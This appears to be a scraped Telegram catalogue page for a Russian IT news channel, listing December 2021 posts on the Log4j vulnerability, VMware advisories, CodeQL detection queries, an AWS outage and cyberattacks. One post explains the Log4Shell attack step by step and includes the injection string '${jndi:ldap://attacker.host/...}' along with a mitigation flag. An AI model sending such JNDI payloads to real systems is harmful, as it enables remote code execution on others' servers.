Адрес канала:
Категории:
Технологии
Язык: Русский
Количество подписчиков:
214
Описание канала:
Канал о жизни IT отрасли во всех её проявлениях.
Новости и анонсы телеком индустрии, разработчиков ПО и информационной безопасности.
Не переключайтесь!
Обратная связь: @LetsTalkFeeback_bot
Рейтинги и Отзывы
Оценить канал letstalkit и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.
5 звезд
0
4 звезд
0
3 звезд
2
2 звезд
0
1 звезд
0
Последние сообщения
2021-12-16 00:02:36
https://3dnews.ru/1055998/obnarugena-novaya-uyazvimost-biblioteki-log4j-patch-uge-vipushchen
66 views21:02
2021-12-15 22:41:22
У веб-сервисов Amazon и не только, снова проблемы Десятки тысяч пользователей сообщают о проблемах с платформой – несколько приложений отключены, сообщает Downdetector
73 views19:41
2021-12-15 22:41:22
Штош
73 views19:41
2021-12-12 19:36:55
Тут пришли подтверждения, так сказать, что VMware реально под ударом из-за бага с Log4j
https://twitter.com/tnpitsecurity/status/1469429810216771589
Вот страница от самой VMware, где можно отслеживать статус по продуктам, а так же узнать о workaround'е (не для всего есть)
https://www.vmware.com/security/advisories/VMSA-2021-0028.html
В общем, если у вас Варя наружу торчит, то пора меры принимать, потому что 10/10 критичность.
117 views16:36
2021-12-12 01:47:47
121 views22:47
2021-12-10 21:34:57
CodeQL for Log4j
“Пятница-пятницей, а Log4j JNDI инъекцию никто не отменял :) все про нее уже в курсе, но если нет, то почитать можно тут или тут, ну или по-русски тут. Для CodeQL соответственно сразу же подъехали экспериментальные запросы: https://github.com/github/codeql/pull/7354/files
Можно уже погонять на своём коде. Сами запросы используют csv-модели, то есть разделенные точкой с запятой однострочные описания неймспейса, типа, подтипа, имени класса и еще нескольких параметров для задания source'a, sink'a и summary. Это укорачивает спецификацию этих элементов, позволяет их писать быстрее, но читать это чуть непривычнее :)»
За текст спасибо @shad0wrunner
Из чата @codeql
#dev #ops #attack #sast
114 views18:34
2021-12-10 20:58:44
У половины интернета нашли выполнение произвольного кода через
Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
89 views17:58
2021-12-10 19:54:30
хакеры замахнулись на святое для американцев! жертвой атаки стал один из крупнейших производителей сыра — компания Schreiber Foods из штата Висконсин. Атака была еще в октябре, производство пришлось приостановить на несколько дней, и остановка серьезно затронула производство сливочного сыра (cream cheese) — в период повышенного спроса на него. И вот теперь рынки накрывает нехватка этого продукта, и американцы негодуют! Не получится есть бейгели с кримчизом, или сделать чизкейк. Жизнь как она есть — заканчивается.
https://www.bloomberg.com/news/articles/2021-12-09/that-cream-cheese-shortage-you-heard-about-cyberattacks-played-a-part
89 views16:54
2021-12-08 01:41:42
https://www.bleepingcomputer.com/news/security/former-ubiquiti-dev-charged-for-trying-to-extort-his-employer/
117 views22:41